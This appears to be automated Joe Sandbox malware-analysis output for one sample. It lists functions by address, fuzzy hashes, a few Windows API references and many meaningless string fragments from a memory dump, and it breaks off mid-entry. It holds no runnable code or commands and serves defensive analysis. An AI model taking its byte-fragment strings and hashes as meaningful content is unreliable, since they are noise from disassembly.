Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction ID: f9f74203cb0f9e83ad797e69d0f4a5a3833b9a2f92df1915b86cf892759fb85d
Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction Fuzzy Hash: B6F06525618B45C5DA789B47E8E0239A7A1FB8C744F900176EE4F53764CE3CD4518B10

Function 00007FF7648C2F40 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF7648C2F63

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction ID: e6e6271d59c0223126c236b3051c6a7c5be87812f0d7ccd35a7a43a84588f04f
Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction Fuzzy Hash: 3AE06802D1C396C2E1381B2220900B9AB601F86354FA41320EA9E106D0C90DCA674E10

Non-executed Functions

Function 00007FF7648929E0 Relevance: 60.3, Strings: 44, Instructions: 5277COMMON

Download Yara Rule

Strings

pMkl, xrefs: 00007FF764895CD4
M!l, xrefs: 00007FF7648942CD
Z@b, xrefs: 00007FF764892ED9
pMkl, xrefs: 00007FF764897211
^+8, xrefs: 00007FF764893B24
a`P, xrefs: 00007FF7648930D0
pMkl, xrefs: 00007FF7648995C1
CKv, xrefs: 00007FF76489452C
L!l, xrefs: 00007FF7648935DB
, D, xrefs: 00007FF764892DBE
pMkl, xrefs: 00007FF764896B54
-Mp, xrefs: 00007FF7648979A4
- D, xrefs: 00007FF764892DD6
pMkl, xrefs: 00007FF76489892F
L,\l, xrefs: 00007FF764899634
.]c, xrefs: 00007FF764895B55
pMkl, xrefs: 00007FF764896C3C
Vp\*, xrefs: 00007FF7648957B8
M!l, xrefs: 00007FF7648988F3
-Mp, xrefs: 00007FF764893A1E
pMkl, xrefs: 00007FF7648941D4
b`P, xrefs: 00007FF764895411
pMkl, xrefs: 00007FF76489944D
pMkl, xrefs: 00007FF7648960A8
H>A, xrefs: 00007FF7648956BD
^+8, xrefs: 00007FF764892D20
Vp\*, xrefs: 00007FF764898A52
L,\l, xrefs: 00007FF7648942D9
- D, xrefs: 00007FF76489348E
DKv, xrefs: 00007FF7648959B0
.]c, xrefs: 00007FF764897928
^+8, xrefs: 00007FF764893B3C
DKv, xrefs: 00007FF764899786
H>A, xrefs: 00007FF764892DE2
oMkl, xrefs: 00007FF7648942C1
pS, xrefs: 00007FF7648980A7
3{, xrefs: 00007FF764895B11
pMkl, xrefs: 00007FF764899712
[@b, xrefs: 00007FF764898261
M!l, xrefs: 00007FF7648973FD
b`P, xrefs: 00007FF7648930E8
pS, xrefs: 00007FF7648969FD
[@b, xrefs: 00007FF764895B49
pMkl, xrefs: 00007FF7648950B3

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: , D$- D$- D$-Mp$-Mp$.]c$.]c$3{$CKv$DKv$DKv$H>A$H>A$L,\l$L,\l$L!l$M!l$M!l$M!l$Vp\*$Vp\*$Z@b$[@b$[@b$a`P$b`P$b`P$oMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pS$pS$^+8$^+8$^+8
API String ID: 0-3060701247
Opcode ID: d0c055135f0365669ed6390500889401e5a9bc649a1eb788d5c4ea856c5a02a7
Instruction ID: 0e7b70d2a5de501013117511833f1f2daa80955e941f3fbb646c3535bab1fe8e
Opcode Fuzzy Hash: d0c055135f0365669ed6390500889401e5a9bc649a1eb788d5c4ea856c5a02a7
Instruction Fuzzy Hash: 8FB38925A09BC7CAEB789E2A8CE03FD73D1EB44754F90453AC64E4BB94CF2CA9508751

Function 00007FF7648AB6B0 Relevance: 48.0, Strings: 35, Instructions: 4292COMMON

Download Yara Rule

Strings

~{, xrefs: 00007FF7648B00F2
~{, xrefs: 00007FF7648AC924
2>", xrefs: 00007FF7648AC970
Pw3, xrefs: 00007FF7648AEB18
)OqW, xrefs: 00007FF7648ACEFC
*OqW, xrefs: 00007FF7648AD160
Pw3, xrefs: 00007FF7648AC510
6j]U, xrefs: 00007FF7648AE52A
2>", xrefs: 00007FF7648AE196
n^ m, xrefs: 00007FF7648B0F4C
f@~, xrefs: 00007FF7648AE83D
zB/, xrefs: 00007FF7648AE8EB
6j]U, xrefs: 00007FF7648AD640
()m, xrefs: 00007FF7648B0E85
zB/, xrefs: 00007FF7648AC3DD
J"l[, xrefs: 00007FF7648AD330
~{, xrefs: 00007FF7648ADC97
n,9T, xrefs: 00007FF7648AC706
xYjl, xrefs: 00007FF7648ACA47
+CB, xrefs: 00007FF7648ADFAC
f@~, xrefs: 00007FF7648ADC3F
()m, xrefs: 00007FF7648ADE1D
XdU, xrefs: 00007FF7648AECD5
o,9T, xrefs: 00007FF7648AE430
Pw3, xrefs: 00007FF7648AF495
*OqW, xrefs: 00007FF7648ACF07
o,9T, xrefs: 00007FF7648AD635
n^ m, xrefs: 00007FF7648B0175
xYjl, xrefs: 00007FF7648AEC00
XdU, xrefs: 00007FF7648AD64B
zB/, xrefs: 00007FF7648ACAF0
J"l[, xrefs: 00007FF7648AD45C
+CB, xrefs: 00007FF7648AC3E3
e@~, xrefs: 00007FF7648AC8DA
I"l[, xrefs: 00007FF7648AC428

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ~{$2>"$2>"$Pw3$Pw3$Pw3$~{$~{$)OqW$*OqW$*OqW$+CB$+CB$6j]U$6j]U$I"l[$J"l[$J"l[$e@~$f@~$f@~$n,9T$n^ m$n^ m$o,9T$o,9T$xYjl$xYjl$zB/$zB/$zB/$()m$()m$XdU$XdU
API String ID: 0-2338440668
Opcode ID: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
Instruction ID: e1386c8f3dfe27f03be67623f49aa2298c963a36377a25ec2961107c2c9d337e
Opcode Fuzzy Hash: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
Instruction Fuzzy Hash: D993B63660C7CBC6EA749F1AA4C03BEA391EB85740FA04536DA8DC7B94DF6CD4908B51

Function 00007FF764871920 Relevance: 39.4, Strings: 30, Instructions: 1904COMMON

Download Yara Rule

Strings

td8, xrefs: 00007FF764871AD0
X~wo, xrefs: 00007FF764873C2C
kwEb, xrefs: 00007FF764873C70
(]u, xrefs: 00007FF764872B09
b[`S, xrefs: 00007FF764872414
8\q , xrefs: 00007FF7648719AB
k=5, xrefs: 00007FF7648737A0
DcW, xrefs: 00007FF764873243
7\q , xrefs: 00007FF764871BD2
(]u, xrefs: 00007FF764873184
a[`S, xrefs: 00007FF764871D21
X~wo, xrefs: 00007FF7648724A1
;3RB, xrefs: 00007FF7648722B9
b[`S, xrefs: 00007FF764871D2C
DcW, xrefs: 00007FF7648723D9
Nc^m, xrefs: 00007FF76487235D
Wc,, xrefs: 00007FF764873608
G#p, xrefs: 00007FF764872D63
ud8, xrefs: 00007FF764871CC4
Wc,, xrefs: 00007FF764871FF2
8\q , xrefs: 00007FF764871BE8
k=5, xrefs: 00007FF76487257C
Nc^m, xrefs: 00007FF76487248B
<3RB, xrefs: 00007FF7648722C4
Mc^m, xrefs: 00007FF764872480
<3RB, xrefs: 00007FF764872DAF
ud8, xrefs: 00007FF7648732E5
G#p, xrefs: 00007FF764871FFD
']u, xrefs: 00007FF764871B6B
kwEb, xrefs: 00007FF764873DE4

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ']u$(]u$(]u$7\q $8\q $8\q $;3RB$<3RB$<3RB$G#p$G#p$Mc^m$Nc^m$Nc^m$Wc,$Wc,$X~wo$X~wo$a[`S$b[`S$b[`S$k=5$k=5$kwEb$kwEb$td8$ud8$ud8$DcW$DcW
API String ID: 0-67992731
Opcode ID: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
Instruction ID: 1212ff62e2219364a8ba2d3e29a51180983abdd92d147b504c7a22d4c2c5d240
Opcode Fuzzy Hash: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
Instruction Fuzzy Hash: 0203DA26A0C283C6EA759E2654F03BEEAD0BB55350FA40536D5CDC7FD5CA2CE8D18B12

Function 00007FF7648E8AB0 Relevance: 35.3, APIs: 3, Strings: 16, Instructions: 2093COMMON

Download Yara Rule

Strings

P$, xrefs: 00007FF7648EA17D
E_oq, xrefs: 00007FF7648EA300
|1U, xrefs: 00007FF7648E9A65
D_oq, xrefs: 00007FF7648E91DB
_P", xrefs: 00007FF7648EABE2
E_oq, xrefs: 00007FF7648E91E7
TKp/, xrefs: 00007FF7648EA82F
SKp/, xrefs: 00007FF7648E9791
P$, xrefs: 00007FF7648E9FAE
^t.+, xrefs: 00007FF7648E9037
P$, xrefs: 00007FF7648E9CD0
TKp/, xrefs: 00007FF7648E979D
|1U, xrefs: 00007FF7648EB437
_P", xrefs: 00007FF7648E9D0D
P$, xrefs: 00007FF7648E8FA6
^t.+, xrefs: 00007FF7648E9B69

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: D_oq$E_oq$E_oq$SKp/$TKp/$TKp/$^t.+$^t.+$|1U$|1U$P$$P$$P$$P$$_P"$_P"
API String ID: 0-202705158
Opcode ID: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
Instruction ID: f12d4fd09084df76d1fe4c8217736d0dda858260febf55cff70beb95aa615c8b
Opcode Fuzzy Hash: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
Instruction Fuzzy Hash: 8523D836A15BC6C9DBB89F37D8D42FD63A0EB49788F900136DA0E0BB64CE2CD6519315

Function 00007FF7648B6DF0 Relevance: 34.5, Strings: 27, Instructions: 769COMMON

Download Yara Rule

Strings

N9, xrefs: 00007FF7648B7587
r, xrefs: 00007FF7648B7127
r, xrefs: 00007FF7648B720F
fqE, xrefs: 00007FF7648B8D5E
Va, xrefs: 00007FF7648B94D0
fqE, xrefs: 00007FF7648B9379
Va, xrefs: 00007FF7648B96A0
N9, xrefs: 00007FF7648B79A7
r, xrefs: 00007FF7648B7B0C
Wv4-, xrefs: 00007FF7648BA8F0
^', xrefs: 00007FF7648B9D26
lZ(M, xrefs: 00007FF7648B7A65
#cZ2, xrefs: 00007FF7648B76F4
#@+!, xrefs: 00007FF7648B7020
^', xrefs: 00007FF7648BA44D
kZ(M, xrefs: 00007FF7648B6F72
9\4P, xrefs: 00007FF7648B70E2
$@+!, xrefs: 00007FF7648B7041
Kc, xrefs: 00007FF7648BA606
eqE, xrefs: 00007FF7648B8D3D
lZ(M, xrefs: 00007FF7648B70D7
#cZ2, xrefs: 00007FF7648B7896
AlC(, xrefs: 00007FF7648B9DBC
M9, xrefs: 00007FF7648B7111
eSTl, xrefs: 00007FF7648B9F7B
9\4P, xrefs: 00007FF7648B770A
unordered_map/set too long, xrefs: 00007FF7648BA96D

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: r$r$r$ Kc$#@+!$#cZ2$#cZ2$$@+!$9\4P$9\4P$AlC($M9$N9$N9$Va$Va$Wv4-$eSTl$eqE$fqE$fqE$kZ(M$lZ(M$lZ(M$unordered_map/set too long$^'$^'
API String ID: 0-2172891005
Opcode ID: db7b9c826f139c0146d2a4938a26e309d81a54ab8daca80f1c3122a56204b761
Instruction ID: 3eb1778543a22e373370c3d729d2592165379d35e535e3bb224efe3912fe06d2
Opcode Fuzzy Hash: db7b9c826f139c0146d2a4938a26e309d81a54ab8daca80f1c3122a56204b761
Instruction Fuzzy Hash: 5472FE36A0C787CAEA74AF1691C027EE690EB84754FA05536ED4DD7B98CE2CE450CB12

Function 00007FF76486C400 Relevance: 33.2, Strings: 25, Instructions: 1974COMMON

Download Yara Rule

Strings

%$Ip, xrefs: 00007FF76486D17F
P(A, xrefs: 00007FF76486D829
@Y7@, xrefs: 00007FF76486D981
o>;, xrefs: 00007FF76486E0B1
y, xrefs: 00007FF76486C7A6
P(A, xrefs: 00007FF76486DA2F
l6", xrefs: 00007FF76486D6F1
Rw]0, xrefs: 00007FF76486CD6E
l6", xrefs: 00007FF76486D344
Rw]0, xrefs: 00007FF76486C9F5
O(A, xrefs: 00007FF76486C936
%$Ip, xrefs: 00007FF76486D3A9
@Y7@, xrefs: 00007FF76486C962
tG%, xrefs: 00007FF76486C9DF
^z.5, xrefs: 00007FF76486E52B
l6", xrefs: 00007FF76486EA68
q4, xrefs: 00007FF76486D212
^z.5, xrefs: 00007FF76486D8E0
o>;, xrefs: 00007FF76486CFAC
y, xrefs: 00007FF76486D99E
Rw]0, xrefs: 00007FF76486C864
sG%, xrefs: 00007FF76486C9D4
q4, xrefs: 00007FF76486D94F
tG%, xrefs: 00007FF76486E47C
tG%, xrefs: 00007FF76486C80A

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: q4$q4$%$Ip$%$Ip$@Y7@$@Y7@$O(A$P(A$P(A$Rw]0$Rw]0$Rw]0$^z.5$^z.5$sG%$tG%$tG%$tG%$l6"$l6"$l6"$o>;$o>;$y$y
API String ID: 0-3491445807
Opcode ID: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
Instruction ID: 0f2cd482dc4406cc925eaf942cb92c3efc560c5aa675326541478a69db5c3d8b
Opcode Fuzzy Hash: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
Instruction Fuzzy Hash: 39130632A0D6C2D6DAB45E2AA4D42BEF7D1EBC5300FA40137DA8DD7B95DE2CD4508B21

Function 00007FF7648A6DE0 Relevance: 31.9, Strings: 24, Instructions: 1944COMMON

Download Yara Rule

Strings

3X, xrefs: 00007FF7648A89C7
B|9,, xrefs: 00007FF7648A92AB
/R{m, xrefs: 00007FF7648A781D
/R{m, xrefs: 00007FF7648A8CEE
!s(, xrefs: 00007FF7648A94B2
B|9,, xrefs: 00007FF7648A6ECD
!s(, xrefs: 00007FF7648A79BE
3nzt, xrefs: 00007FF7648A73F3
gO6`, xrefs: 00007FF7648A7E60
B|9,, xrefs: 00007FF7648A9433
!s(, xrefs: 00007FF7648A8C56
!s(, xrefs: 00007FF7648A8C76
PN9, xrefs: 00007FF7648A7BD6
gO6`, xrefs: 00007FF7648A85FC
!s(, xrefs: 00007FF7648A82E9
PN9, xrefs: 00007FF7648A87D0
B|9,, xrefs: 00007FF7648A9438
!s(, xrefs: 00007FF7648A889E
`@u, xrefs: 00007FF7648A9195
ON9, xrefs: 00007FF7648A71E1
!s(, xrefs: 00007FF7648A88BE
3nzt, xrefs: 00007FF7648A8074
3X, xrefs: 00007FF7648A7165
`@u, xrefs: 00007FF7648A80B4

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: !s($ !s($ !s($ !s($ !s($ !s($ !s($/R{m$/R{m$3nzt$3nzt$B|9,$B|9,$B|9,$B|9,$ON9$PN9$PN9$`@u$`@u$gO6`$gO6`$3X$3X
API String ID: 0-470075873
Opcode ID: 39a5832a991fc4bcebe2d9129d18d74263d6f7e85bbb63d29bf8438b68520ba0
Instruction ID: e76a6ba500b0d6f3eb410c93e449829c22e96d05fef7a6c62433764170b9d6ed
Opcode Fuzzy Hash: 39a5832a991fc4bcebe2d9129d18d74263d6f7e85bbb63d29bf8438b68520ba0
Instruction Fuzzy Hash: AE13BB23E4C283C6EAB46E1E90C027EE691AB55310FB41932D59DD7F98CE6CD4F09B61

Function 00007FF76488D390 Relevance: 30.4, Strings: 23, Instructions: 1655COMMON

Download Yara Rule

Strings

<<b, xrefs: 00007FF76488DE49
<<b, xrefs: 00007FF76488D8E0
@r#X, xrefs: 00007FF76488DC6B
;#%, xrefs: 00007FF76488DB22
AMC, xrefs: 00007FF76488DA24
RRd`, xrefs: 00007FF76488EED9
AMC, xrefs: 00007FF76488EFDC
;,y3, xrefs: 00007FF76488ED6B
QRd`, xrefs: 00007FF76488D5C1
@MC, xrefs: 00007FF76488DA19
s|x2, xrefs: 00007FF76488F0E0
"2ZB, xrefs: 00007FF76488DD23
"2ZB, xrefs: 00007FF76488DF36
;,y3, xrefs: 00007FF76488D50D
;,y3, xrefs: 00007FF76488D85C
<<b, xrefs: 00007FF76488DE44
Ar#X, xrefs: 00007FF76488DC76
Ar#X, xrefs: 00007FF76488D5F7
<<b, xrefs: 00007FF76488F13E
;#%, xrefs: 00007FF76488D684
RRd`, xrefs: 00007FF76488D5CC
;<b, xrefs: 00007FF76488D8D5
s|x2, xrefs: 00007FF76488D502

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: "2ZB$"2ZB$;#%$;#%$;,y3$;,y3$;,y3$;<b$<<b$<<b$<<b$<<b$@MC$@r#X$AMC$AMC$Ar#X$Ar#X$QRd`$RRd`$RRd`$s|x2$s|x2
API String ID: 0-4187098220
Opcode ID: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
Instruction ID: 7ddd09a8cf168cd9b12f49e1d1a8b18489fdcb7430eedffe39b937f48a90cb08
Opcode Fuzzy Hash: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
Instruction Fuzzy Hash: 16F2C735A0C687CAEA749E1AA4C06BEE7D0EB94744FA00533D94DC7799CF2CF4908B61

Function 00007FF764890740 Relevance: 27.1, Strings: 21, Instructions: 864COMMON

Download Yara Rule

Strings

"k5, xrefs: 00007FF764890E29
q\z, xrefs: 00007FF764890BDA
q\z, xrefs: 00007FF764890BE5
}k+, xrefs: 00007FF76489084C
~0%), xrefs: 00007FF764891834
~0%), xrefs: 00007FF764890C60
HSM-, xrefs: 00007FF764890DE6
}k+, xrefs: 00007FF764890D9B
V}M, xrefs: 00007FF764890D04
"k5, xrefs: 00007FF764890E24
!k5, xrefs: 00007FF7648907CD
GSM-, xrefs: 00007FF7648907C2
V}M, xrefs: 00007FF764890CDC
HSM-, xrefs: 00007FF764890CA9
|k+, xrefs: 00007FF764890841
q\z, xrefs: 00007FF7648911CE
V}M, xrefs: 00007FF764890C1F
q\z, xrefs: 00007FF764891544
"k5, xrefs: 00007FF7648917BB
"k5, xrefs: 00007FF76489100D
q\z, xrefs: 00007FF7648911C4

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: !k5$"k5$"k5$"k5$"k5$GSM-$HSM-$HSM-$V}M$V}M$V}M$|k+$}k+$}k+$~0%)$~0%)$q\z$q\z$q\z$q\z$q\z
API String ID: 0-2622637242
Opcode ID: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
Instruction ID: 21689d4d850e3b50dd4f2a989e8bdace878e658c4a2c16c8b7f94ebdf9d98ccc
Opcode Fuzzy Hash: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
Instruction Fuzzy Hash: E382B925A0CB87D5EA749E1F98C027EA791EB86760FA04132D68DC7B94CF2DFC508B51

Function 00007FF7648664A0 Relevance: 26.3, Strings: 19, Instructions: 2521COMMON

Download Yara Rule

Strings

6;ti, xrefs: 00007FF7648676AC
a[, xrefs: 00007FF7648675A8
A{9s, xrefs: 00007FF764867269
VFL(, xrefs: 00007FF7648677B9
a[, xrefs: 00007FF764867569
x"a, xrefs: 00007FF7648684A5
Cs6, xrefs: 00007FF764867888
w"a, xrefs: 00007FF764866F14
VFL(, xrefs: 00007FF7648668C7
x"a, xrefs: 00007FF76486946D
a[, xrefs: 00007FF7648675AD
jyku, xrefs: 00007FF764867DB4
A{9s, xrefs: 00007FF7648687B7
@{9s, xrefs: 00007FF764866720
A{9s, xrefs: 00007FF7648687A2
jyku, xrefs: 00007FF764867854
A{9s, xrefs: 00007FF764867C93
iyku, xrefs: 00007FF764866708
Cs6, xrefs: 00007FF76486820E

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: 6;ti$@{9s$A{9s$A{9s$A{9s$A{9s$Cs6$Cs6$VFL($VFL($iyku$jyku$jyku$w"a$x"a$x"a$a[$a[$a[
API String ID: 0-3286678768
Opcode ID: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
Instruction ID: 97cfdc0c82166db01eb0b39151068656f7fb8d9e2acd61275057ae7db6d843ed
Opcode Fuzzy Hash: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
Instruction Fuzzy Hash: ED331B31A0C7C3D5DEB85E16A0D527EE391EB95790F90013BDA8E63BD8DE2CD4608B51

Function 00007FF7648C2010 Relevance: 21.6, APIs: 3, Strings: 9, Instructions: 618COMMON

Download Yara Rule

Strings

gqYG, xrefs: 00007FF7648C2419
'fj&, xrefs: 00007FF7648C2082
(fj&, xrefs: 00007FF7648C2836
(fj&, xrefs: 00007FF7648C2478
.NP, xrefs: 00007FF7648C29D3
.NP, xrefs: 00007FF7648C2151
gqYG, xrefs: 00007FF7648C28B9
.NP, xrefs: 00007FF7648C213B
gqYG, xrefs: 00007FF7648C2844

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: 'fj&$(fj&$(fj&$gqYG$gqYG$gqYG$.NP$.NP$.NP
API String ID: 0-4046524389
Opcode ID: 0c434476c7000b30d91b4396411714a4663a08d5c183c151bf309e51ec6473f1
Instruction ID: a8e6e1417f525d85b80886109f579e6554f1556e27fb1ad6faca2aad6e2ea5bc
Opcode Fuzzy Hash: 0c434476c7000b30d91b4396411714a4663a08d5c183c151bf309e51ec6473f1
Instruction Fuzzy Hash: C642C726E08743CAFB74AF7A94D03FD6691AB14754FA02536E90DC77D4CE2CE8608B61

Function 00007FF7648C5B80 Relevance: 20.9, Strings: 15, Instructions: 2162COMMON

Download Yara Rule

Strings

>(q, xrefs: 00007FF7648C6D4D
h,], xrefs: 00007FF7648C7BCD
/, xrefs: 00007FF7648C5E76
|bC, xrefs: 00007FF7648C65DC
h,], xrefs: 00007FF7648C772E
>(q, xrefs: 00007FF7648C5E6A
|bC, xrefs: 00007FF7648C6406
Ap1, xrefs: 00007FF7648C5DD0
{bC, xrefs: 00007FF7648C5DA0
Ap1, xrefs: 00007FF7648C6C42
/, xrefs: 00007FF7648C612F
>(q, xrefs: 00007FF7648C686E
9sJZ, xrefs: 00007FF7648C7723
9sJZ, xrefs: 00007FF7648C6F11
>(q, xrefs: 00007FF7648C6873

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

